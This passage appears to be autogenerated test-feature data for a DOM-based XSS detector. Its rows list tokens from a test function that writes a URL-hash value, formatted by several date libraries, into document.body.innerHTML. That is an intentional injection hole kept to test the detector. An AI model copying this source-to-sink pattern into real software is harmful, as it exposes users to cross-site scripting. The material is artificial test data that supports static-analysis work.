autogenerated/Xss/DomBasedXss/dates.js:32:11:32:17 | dateFns | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:32:11:32:17 | dateFns | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:32:11:32:17 | dateFns | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:32:11:32:17 | dateFns | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:32:11:32:40 | dateFns | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:32:11:32:40 | dateFns | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:32:11:32:40 | dateFns | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:32:11:32:40 | dateFns | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:32:11:32:40 | dateFns | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:32:11:32:40 | dateFns ... apter() | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:32:11:32:40 | dateFns ... apter() | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:32:11:32:40 | dateFns ... apter() | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:32:11:32:40 | dateFns ... apter() | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:32:11:32:40 | dateFns ... apter() | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:32:21:32:40 | exceptional return of new DateFnsAdapter() | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:32:21:32:40 | exceptional return of new DateFnsAdapter() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:32:21:32:40 | exceptional return of new DateFnsAdapter() | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:32:21:32:40 | exceptional return of new DateFnsAdapter() | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:32:21:32:40 | exceptional return of new DateFnsAdapter() | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:32:21:32:40 | new DateFnsAdapter() | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:32:21:32:40 | new DateFnsAdapter() | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:32:21:32:40 | new DateFnsAdapter() | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:32:21:32:40 | new DateFnsAdapter() | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:32:21:32:40 | new DateFnsAdapter() | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:32:25:32:38 | DateFnsAdapter | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:32:25:32:38 | DateFnsAdapter | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:32:25:32:38 | DateFnsAdapter | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:32:25:32:38 | DateFnsAdapter | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:32:25:32:38 | DateFnsAdapter | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:33:11:33:15 | luxon | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:33:11:33:15 | luxon | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:33:11:33:15 | luxon | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:33:11:33:15 | luxon | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:33:11:33:15 | luxon | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:33:11:33:36 | luxon | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:33:11:33:36 | luxon | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:33:11:33:36 | luxon | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:33:11:33:36 | luxon | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:33:11:33:36 | luxon | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:33:11:33:36 | luxon = ... apter() | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:33:11:33:36 | luxon = ... apter() | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:33:11:33:36 | luxon = ... apter() | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:33:11:33:36 | luxon = ... apter() | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:33:11:33:36 | luxon = ... apter() | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:33:19:33:36 | exceptional return of new LuxonAdapter() | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:33:19:33:36 | exceptional return of new LuxonAdapter() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:33:19:33:36 | exceptional return of new LuxonAdapter() | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:33:19:33:36 | exceptional return of new LuxonAdapter() | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:33:19:33:36 | exceptional return of new LuxonAdapter() | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:33:19:33:36 | new LuxonAdapter() | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:33:19:33:36 | new LuxonAdapter() | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:33:19:33:36 | new LuxonAdapter() | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:33:19:33:36 | new LuxonAdapter() | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:33:19:33:36 | new LuxonAdapter() | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:33:23:33:34 | LuxonAdapter | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:33:23:33:34 | LuxonAdapter | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:33:23:33:34 | LuxonAdapter | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:33:23:33:34 | LuxonAdapter | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:33:23:33:34 | LuxonAdapter | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:34:11:34:16 | moment | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:34:11:34:16 | moment | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:34:11:34:16 | moment | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:34:11:34:16 | moment | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:34:11:34:16 | moment | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:34:11:34:38 | moment | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:34:11:34:38 | moment | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:34:11:34:38 | moment | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:34:11:34:38 | moment | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:34:11:34:38 | moment | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:34:11:34:38 | moment ... apter() | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:34:11:34:38 | moment ... apter() | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:34:11:34:38 | moment ... apter() | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:34:11:34:38 | moment ... apter() | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:34:11:34:38 | moment ... apter() | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:34:20:34:38 | exceptional return of new MomentAdapter() | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:34:20:34:38 | exceptional return of new MomentAdapter() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:34:20:34:38 | exceptional return of new MomentAdapter() | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:34:20:34:38 | exceptional return of new MomentAdapter() | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:34:20:34:38 | exceptional return of new MomentAdapter() | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:34:20:34:38 | new MomentAdapter() | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:34:20:34:38 | new MomentAdapter() | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:34:20:34:38 | new MomentAdapter() | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:34:20:34:38 | new MomentAdapter() | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:34:20:34:38 | new MomentAdapter() | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:34:24:34:36 | MomentAdapter | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:34:24:34:36 | MomentAdapter | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:34:24:34:36 | MomentAdapter | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:34:24:34:36 | MomentAdapter | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:34:24:34:36 | MomentAdapter | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:35:11:35:15 | dayjs | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:35:11:35:15 | dayjs | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:35:11:35:15 | dayjs | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:35:11:35:15 | dayjs | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:35:11:35:15 | dayjs | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:35:11:35:36 | dayjs | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:35:11:35:36 | dayjs | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:35:11:35:36 | dayjs | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:35:11:35:36 | dayjs | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:35:11:35:36 | dayjs | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:35:11:35:36 | dayjs = ... apter() | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:35:11:35:36 | dayjs = ... apter() | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:35:11:35:36 | dayjs = ... apter() | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:35:11:35:36 | dayjs = ... apter() | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:35:11:35:36 | dayjs = ... apter() | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:35:19:35:36 | exceptional return of new DayJSAdapter() | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:35:19:35:36 | exceptional return of new DayJSAdapter() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:35:19:35:36 | exceptional return of new DayJSAdapter() | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:35:19:35:36 | exceptional return of new DayJSAdapter() | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:35:19:35:36 | exceptional return of new DayJSAdapter() | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:35:19:35:36 | new DayJSAdapter() | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:35:19:35:36 | new DayJSAdapter() | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:35:19:35:36 | new DayJSAdapter() | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:35:19:35:36 | new DayJSAdapter() | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:35:19:35:36 | new DayJSAdapter() | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:35:23:35:34 | DayJSAdapter | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:35:23:35:34 | DayJSAdapter | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:35:23:35:34 | DayJSAdapter | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:35:23:35:34 | DayJSAdapter | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:35:23:35:34 | DayJSAdapter | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:37:5:37:12 | document | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:37:5:37:12 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:37:5:37:12 | document | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:37:5:37:12 | document | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:37:5:37:12 | document | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:37:5:37:17 | document.body | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:37:5:37:17 | document.body | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:37:5:37:17 | document.body | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:37:5:37:17 | document.body | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:37:5:37:17 | document.body | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:37:5:37:27 | documen ... nerHTML | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:37:5:37:27 | documen ... nerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:37:5:37:27 | documen ... nerHTML | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:37:5:37:27 | documen ... nerHTML | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:37:5:37:27 | documen ... nerHTML | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:37:5:37:84 | documen ... aint)}` | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:37:5:37:84 | documen ... aint)}` | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:37:5:37:84 | documen ... aint)}` | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:37:5:37:84 | documen ... aint)}` | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:37:5:37:84 | documen ... aint)}` | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:37:14:37:17 | body | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:37:14:37:17 | body | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:37:14:37:17 | body | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:37:14:37:17 | body | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:37:14:37:17 | body | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:37:19:37:27 | innerHTML | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:37:19:37:27 | innerHTML | 